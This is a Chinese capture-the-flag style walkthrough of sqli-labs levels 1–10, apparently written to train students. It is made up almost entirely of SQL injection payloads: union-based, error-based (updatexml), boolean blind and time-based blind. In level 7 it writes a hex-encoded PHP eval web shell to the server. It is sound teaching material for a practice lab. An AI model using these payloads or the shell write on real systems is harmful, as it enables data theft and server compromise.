最近在给协会的小朋友搞培训,顺手写了sqli-labs 1-10关的wp,就发出来一下吧。(做的时候环境是BUUCTF上面的basic的sqli-labs)
第一关(字符型)
-
判断是否存在注入:?id=1' and 1=2%23
-
判断字段数:?id=1' order by 3%23
-
判断回显:?id=-1' union select 1,2,3%23
-
爆数据库名:?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata%23
-
爆表名:?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctftraining'%23
-
爆字段:?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'%23
-
爆数据:?id=-1' union select 1,group_concat(flag),3 from ctftraining.flag%23
第二关(数字型)
-
判断是否存在注入:?id=1 and 1=2%23
-
判断字段数:?id=1 order by 3%23
-
判断回显:?id=-1 union select 1,2,3%23
-
爆数据库名:?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata%23
-
爆表名:?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctftraining'%23
-
爆字段:?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'%23
-
爆数据:?id=-1 union select 1,group_concat(flag),3 from ctftraining.flag%23
第三关(单引号加括号型)
-
判断是否存在注入:?id=1') and 1=2%23
-
判断字段数:1') order by 3%23
-
判断回显:?id=-1') union select 1,2,3%23
-
爆数据库名:?id=-1') union select 1,group_concat(schema_name),3 from information_schema.schemata%23
-
爆表名:?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctftraining'%23
-
爆字段:?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'%23
-
爆数据:?id=-1') union select 1,group_concat(flag),3 from ctftraining.flag%23
第四关(双引号加括号型)
-
判断是否存在注入:?id=1") and 1=2%23
-
判断字段数:?id=1") order by 3%23
-
判断回显:?id=-1") union select 1,2,3%23
-
爆数据库名:?id=-1") union select 1,group_concat(schema_name),3 from information_schema.schemata%23
-
爆表名:?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctftraining'%23
-
爆字段:?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'%23
-
爆数据:?id=-1") union select 1,group_concat(flag),3 from ctftraining.flag%23
第五关(报错注入或字符型盲注)
-
判断是否存在注入:?id=1'
-
爆数据库:?id=1' and updatexml(1,concat('~',substr((select group_concat(schema_name) from information_schema.schemata),1,31),'~'),1)%23
-
爆数据表:?id=1' and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),'~'),1)%23
-
爆字段:?id=1' and updatexml(1,concat('~',substr((select group_concat(column_name) from information_schema.columns where table_name = 'flag'),1,31),'~'),1)%23
-
爆数据:
-
?id=1' and updatexml(1,concat('~',substr((select group_concat(flag) from ctftraining.flag),1,31),'~'),1)%23
-
?id=1' and updatexml(1,concat('~',substr((select group_concat(flag) from ctftraining.flag),32,64),'~'),1)%23
盲注
-
判断是否存在注入:?id=1' and 0%23
-
判断数据库名长度:1' and (length((select group_concat(schema_name) from information_schema.schemata))>69)%23
-
爆数据库名:?id=1' and (ascii(substr((select group_concat(schema_name) from information_schema.schemata),1,1))>1)%23
-
爆表名:?id=1' and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),1,1))>100)%23
-
爆字段:?id=1' and (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),1,1))>105)%23
-
第六关(双引号字符型盲注)
-
判断是否存在注入:?id=1"and 0 %23
-
判断数据库名长度:?id=1" and (length((select group_concat(schema_name) from information_schema.schemata))>68)%23
-
爆数据库名:?id=1" and (ascii(substr((select group_concat(schema_name) from information_schema.schemata),1,1))>1)%23
-
爆表名:?id=1" and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),1,1))>100)%23
-
爆字段:?id=1" and (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),1,1))>105)%23
-
爆数据:?id=1" and (ascii(substr((select group_concat(flag) from ctftraining.flag),1,1))>100)%23
第七关(写shell)
-
写shell:?id=0')) union select null,0x3c3f706870206576616c28245f504f53545b225968636b225d293b3f3e,null into outfile '路径/0.php' --+
第八关(字符型盲注)
-
判断是否存在注入:?id=1' and 0%23
-
判断数据库名长度:1' and (length((select group_concat(schema_name) from information_schema.schemata))>69)%23
-
爆数据库名:?id=1' and (ascii(substr((select group_concat(schema_name) from information_schema.schemata),1,1))>1)%23
-
爆表名:?id=1' and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),1,1))>100)%23
-
爆字段:?id=1' and (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),1,1))>105)%23
-
爆数据:?id=1' and (ascii(substr((select group_concat(flag) from ctftraining.flag),1,1))>100)%23
第九关(单引号字符型时间盲注)
-
判断是否存在注入:?id=1' and sleep(5)%23
-
判断数据库名长度:?id=1' and (if((length((select group_concat(schema_name) from information_schema.schemata))>68),sleep(5),0))%23
-
爆数据库名:?id=1' and (if((ascii(substr((select group_concat(schema_name) from information_schema.schemata),1,1))>1),sleep(5),0))%23
-
爆表名:?id=1' and (if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),1,1))>100),sleep(5),0))%23
-
爆字段:?id=1' and (if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),1,1))>1),sleep(5),0))%23
-
爆数据:?id=1' and (if((ascii(substr((select group_concat(flag) from ctftraining.flag),1,1))>100),sleep(5),0))%23
第十关(双引号字符型时间盲注)
-
判断是否存在注入:?id=1" and sleep(5) %23
-
判断数据库名长度:?id=1" and (if((length((select group_concat(schema_name) from information_schema.schemata))>68),sleep(5),0))%23
-
爆数据库名:?id=1" and (if((ascii(substr((select group_concat(schema_name) from information_schema.schemata),1,1))>1),sleep(5),0))%23
-
-
爆字段:?id=1" and (if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),1,1))>1),sleep(5),0))%23
-
爆数据:?id=1" and (if((ascii(substr((select group_concat(flag) from ctftraining.flag),1,1))>100),sleep(5),0))%23